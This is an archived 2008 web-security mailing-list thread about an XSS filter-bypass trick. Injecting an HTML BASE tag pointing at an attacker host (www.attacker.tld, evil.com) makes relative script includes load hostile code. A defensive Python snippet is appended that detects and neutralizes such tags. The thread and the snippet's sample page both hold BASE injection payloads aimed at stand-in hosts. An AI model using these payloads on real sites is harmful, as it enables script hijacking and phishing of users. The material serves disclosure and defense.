Re: [WEB SECURITY] Nice little XSS trick
- From: "James Landis" <jcl24@xxxxxxxxxxx>
- Subject: Re: [WEB SECURITY] Nice little XSS trick
- Date: Wed, 16 Jul 2008 13:35:48 -0700
It's almost impossible if the attacker can inject a BASE tag into the HEAD.
It's easy if they, oh I dunno, FOLLOW THE SPEC.
-j
On Wed, Jul 16, 2008 at 12:32 PM, Arshan Dabirsiaghi
<arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
> Yeah, and a typical, unfortunate reaction from sirdarkcat (not typical
> of him, just of the security community in general). It's different
> because it'd be trivially easy for the browser vendors to prevent the
> javascript: technique, but almost impossible to fix this variant.
>
> Arshan
>
> -----Original Message-----
> From: David Byrne [mailto:davidribyrne@xxxxxxxxx]
> Sent: Wednesday, July 16, 2008 3:30 PM
> To: Arshan Dabirsiaghi; Amit Klein
> Cc: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> I need to indulge my vanity :) I posted something similar almost a year
> ago. Granted, I didn't take the time to write it up nicely.
>
> http://sla.ckers.org/forum/read.php?2,14751
>
>
>
>
> ----- Original Message ----
> From: Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> To: Amit Klein <aksecurity@xxxxxxxxx>
> Cc: websecurity@xxxxxxxxxxxxx
> Sent: Wednesday, July 16, 2008 8:45:28 AM
> Subject: RE: [WEB SECURITY] Nice little XSS trick
>
> You're too nice - no need to apologize or defer credit. You discovered
> it on your own. If you can't find it in Google, CWE or the OWASP Testing
> Guide, I frankly don't think you can call it public knowledge, and
> therefore it should be publicly discussed.
>
> Arshan
>
> -----Original Message-----
> From: Amit Klein [mailto:aksecurity@xxxxxxxxx]
> Sent: Wednesday, July 16, 2008 10:34 AM
> To: Arshan Dabirsiaghi
> Cc: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> Hi Arshan+list,
>
> Indeed - the same vulnerability. I did google for it, but I didn't
> pick up your site (and RSnake's cheat sheet doesn't list it - now I
> know why).
>
> Anyway - sorry. You deserve full credit for it, of course.
>
> Thanks for the correction and the further information,
> -Amit
>
>
> On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> wrote:
>>
>>
>>
>> http://i8jesus.com/?p=10 (Jan 2008)
>>
>>
>> I also presented this vector last year at OWASP San Jose when I demo'ed
>> AntiSamy as an example of dangerous content that isn't malicious code on its
>> own. That's one of the selling points of AntiSamy - it stops not only XSS
>> (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.
>>
>> I talked about it with RSnake afterwards and he had some crazy reason for
>> not putting it on his cheatsheet - claimed it was too much like the <base
>> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is no longer
>> (according to policy) supposed to be honoring <base> tags outside of <HEAD>,
>> but FF is still vulnerable. You could use this to hijack anything -
>> stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base>
>> won't help you steal as far as resources is anything gathered in JavaScript.
>>
>>
>>
>> I think some of the big players had this figured out already (or more
>> likely, just got really lucky). MySpace takes <base href> values, base64
>> encodes them, and redirects them through another domain. The flow is like
>> this for them:
>>
>>
>>
>> 1. User puts in <base href="http://evil.com">
>> 2. Str = base64("http://evil.com")
>> 3. Profile = <base href="http://msplinks.com/redir?<base64encodedStr>">
>>
>>
>>
>> Maybe there's a way to abuse that, but I don't think so. And eBay doesn't
>> have any relative links after user content, at least when I first looked at
>> this last year. They probably both just got lucky. =]
>>
>>
>>
>> Arshan
>>
>>
>>
>> ---------- Previous message ----------
>>
>> From: Amit Klein <aksecurity@xxxxxxxxx>
>>
>> Date: Tue, Jul 15, 2008 at 7:33 AM
>>
>> Subject: [WEB SECURITY] Nice little XSS trick
>>
>> To: Web Security <websecurity@xxxxxxxxxxxxx>
>>
>>
>>
>>
>>
>> Hi list
>>
>>
>>
>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not on
>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>> BASE, but not the trick I describe here). The idea is to use the HTML BASE
>> tag to force loading of JS code from the attacker's host. Consider a page
>> with XSS vulnerability such as:
>>
>>
>>
>> <html>
>> ...
>> ***XSS code may be embedded here***
>> ...
>> <script src="/foo/bar.js"></script>
>> ...
>> </html>
>>
>>
>>
>> Now, an attacker can inject <base
>> href="http://www.attacker.tld/">, and next thing you know,
>> the browser (IE, at least) loads the JS from
>> http://www.attacker.tld/foo/bar.js... And the beauty is
>> that there's no "explicit" JS code involved in the payload itself.
>>
>>
>>
>> Note that according to the HTML standard, BASE should be placed in the HEAD
>> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>
>>
>>
>> Thanks,
>>
>> -Amit
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
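A defender-side check for the <base> trick discussed in this thread, added here as an illustration and not code from any of the posters: it audits a page for <base> tags followed by relative script/link/img/iframe references (the hijackable pattern Amit describes) and neutralizes <base> in user-supplied HTML, either by dropping it or by rewriting its href through a site-controlled redirector in the MySpace style Arshan outlines. The redirector URL and the sample page are constructed assumptions.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import quote

# Elements whose relative URL a hostile <base href> would resolve against the attacker's host.
RESOURCE_ATTRS = {"script": "src", "link": "href", "img": "src", "iframe": "src"}


def is_relative(url):
    """True for URLs that depend on the document base (no scheme, not protocol-relative)."""
    return bool(url) and "://" not in url and not url.startswith("//")


class BaseTagAuditor(HTMLParser):
    """Records every <base> tag (raw text + href) and the relative resources loaded after it."""

    def __init__(self):
        super().__init__()
        self.base_tags = []   # (raw_tag_text, href) for each <base> seen, any case/quoting
        self.hijackable = []  # relative src/href values that appear after a <base>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base":
            self.base_tags.append((self.get_starttag_text(), a.get("href") or ""))
        elif tag in RESOURCE_ATTRS and self.base_tags:
            url = a.get(RESOURCE_ATTRS[tag]) or ""
            if is_relative(url):
                self.hijackable.append(url)


def audit(html):
    """Return ([(raw, href), ...], [relative_url, ...]) for a full page or a fragment."""
    p = BaseTagAuditor()
    p.feed(html)
    p.close()
    return p.base_tags, p.hijackable


def neutralize_base(fragment, redirector=None):
    """Drop every <base> in user-supplied HTML, or, when a (hypothetical) site-owned
    redirector URL is given, rewrite the href so relative links resolve against that
    domain instead of the attacker's (the MySpace flow described in the thread)."""
    base_tags, _ = audit(fragment)
    out = fragment
    for raw, href in base_tags:
        if redirector and href:
            token = base64.urlsafe_b64encode(href.encode()).decode()
            repl = f'<base href="{redirector}?{quote(token)}">'
        else:
            repl = ""
        out = out.replace(raw, repl, 1)
    return out


# Constructed sample: user content precedes a relative script include, as in Amit's page.
PAGE = ('<html><head><title>t</title></head><body>'
        '<p>user says: <BASE Href="http://attacker.example/">hi</p>'
        '<script src="/foo/bar.js"></script>'
        '<img src="https://cdn.example/x.png"></body></html>')
```

HTMLParser only reports a tag once its closing `>` is seen, so this is a detection aid to pair with an allowlist sanitizer such as AntiSamy, not a replacement for one.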
Brought to you by http://www.webappsec.org